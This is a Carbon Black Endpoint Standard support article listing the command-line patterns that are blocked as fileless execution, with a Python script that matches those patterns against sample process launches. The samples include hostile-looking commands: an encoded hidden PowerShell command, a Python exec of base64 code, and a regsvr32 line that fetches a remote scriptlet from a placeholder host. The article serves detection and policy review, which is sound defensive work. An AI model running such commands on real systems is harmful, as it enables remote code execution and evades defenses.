Endpoint Standard: How to find events blocked by fileless execution without the ttp tag
Article ID: 290256
Products
Carbon Black Cloud Endpoint Standard (formerly Cb Defense)
Issue/Introduction
Find the process launches that would be blocked as fileless execution without relying on the ttp:FILELESS tag
Environment
- Carbon Black Cloud Console: All Versions
- Endpoint Standard Sensor: All Versions
Resolution
The following processes and command-line arguments cause an event to be blocked as a fileless execution. Searching process events for these process names and command-line patterns finds the affected launches even when the ttp:FILELESS tag is not present.
| Process | Command-line arguments |
|---|---|
| cmd.exe | /k, /r, or /c |
| powershell.exe | " \"iex\" ", " iex ", Invoke-Expression, FromBase64String, DeflateStream, -NonI, -e, or -c |
| python.exe | decode or base64 |
| ruby.exe | unpack( |
| perl.exe | decode_base64( |
| regsvr32.exe | sct, /u, or /i:http |
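The script below is an added example, not Carbon Black's own code: it encodes the table above as matching rules and runs them over a handful of constructed process launches to predict which ones the fileless-execution prevention would block. The page does not say how the sensor matches each entry, so the token-boundary handling for switches such as /c, /u, -e and -c (and the whitespace-bounded " iex ") is an assumption; the other entries are treated as case-insensitive substrings. The sample launches and paths are constructed for the example.

```python
"""Predict which process launches Endpoint Standard would block as fileless
execution, using the process / command-line table above as the rule set."""
import ntpath
import re

# (label as it appears in the table, case-insensitive regex over the command line)
# ASSUMPTION: switches are matched as whitespace-delimited tokens; the page does
# not state whether the sensor matches tokens or bare substrings.
RULES = {
    "cmd.exe": [
        ("/k, /r, or /c", r"(?<!\S)/[krc](?!\w)"),
    ],
    "powershell.exe": [
        ('"iex"', r'"iex"'),
        (" iex ", r"(?<!\S)iex(?!\S)"),
        ("Invoke-Expression", r"invoke-expression"),
        ("FromBase64String", r"frombase64string"),
        ("DeflateStream", r"deflatestream"),
        ("-NonI", r"-noni"),  # substring, so -NonInteractive matches too
        ("-e", r"(?<!\S)-e(?!\S)"),
        ("-c", r"(?<!\S)-c(?!\S)"),
    ],
    "python.exe": [("decode", r"decode"), ("base64", r"base64")],
    "ruby.exe": [("unpack(", r"unpack\(")],
    "perl.exe": [("decode_base64(", r"decode_base64\(")],
    "regsvr32.exe": [
        ("sct", r"sct"),
        ("/u", r"(?<!\S)/u(?!\S)"),
        ("/i:http", r"/i:http"),
    ],
}
COMPILED = {
    proc: [(label, re.compile(rx, re.IGNORECASE)) for label, rx in rules]
    for proc, rules in RULES.items()
}


def matching_rules(process_path, cmdline):
    """Return the table entries this launch matches (empty list if none).

    The process is identified by the image file name, compared case-insensitively,
    so a full Windows path or a bare name both work.
    """
    name = ntpath.basename(process_path).lower()
    return [label for label, rx in COMPILED.get(name, []) if rx.search(cmdline)]


def would_be_blocked(process_path, cmdline):
    """True if at least one table entry matches the launch."""
    return bool(matching_rules(process_path, cmdline))


# Constructed sample launches (not real telemetry): (process path, command line)
SAMPLE_LAUNCHES = [
    (r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoP -NonI -W Hidden -e SQBFAFgAIAAoACcAZABpAHIAJwApAA=="),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    (r"C:\Python39\python.exe",
     "python.exe -c \"import base64;exec(base64.b64decode('aW1wb3J0IG9z'))\""),
    (r"C:\Perl\bin\perl.exe",
     "perl.exe -MMIME::Base64 -e \"print decode_base64('aGk=')\""),
    (r"C:\Windows\System32\regsvr32.exe",
     "regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll"),
    (r"C:\Ruby30\bin\ruby.exe", 'ruby.exe -e "puts 1"'),
    (r"C:\Windows\explorer.exe", "explorer.exe"),
]


def scan(launches=SAMPLE_LAUNCHES):
    """Return [(process path, command line, matched entries)] for launches
    that would be blocked; launches matching no entry are dropped."""
    hits = []
    for path, cmd in launches:
        matched = matching_rules(path, cmd)
        if matched:
            hits.append((path, cmd, matched))
    return hits


if __name__ == "__main__":
    for path, cmd, matched in scan():
        print(f"BLOCK  {ntpath.basename(path)}  {cmd}")
        print(f"       matched: {', '.join(matched)}")
```

To use it against real data, replace SAMPLE_LAUNCHES with (process path, command line) pairs exported from the console's process search; any launch reported by scan() is one the table says would be blocked, so it is a candidate for review before the policy is enforced.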
Additional Information
Future work may add more granular exclusions so that specific scripts that use these commands can be allowed to execute (tracked as CBC-383).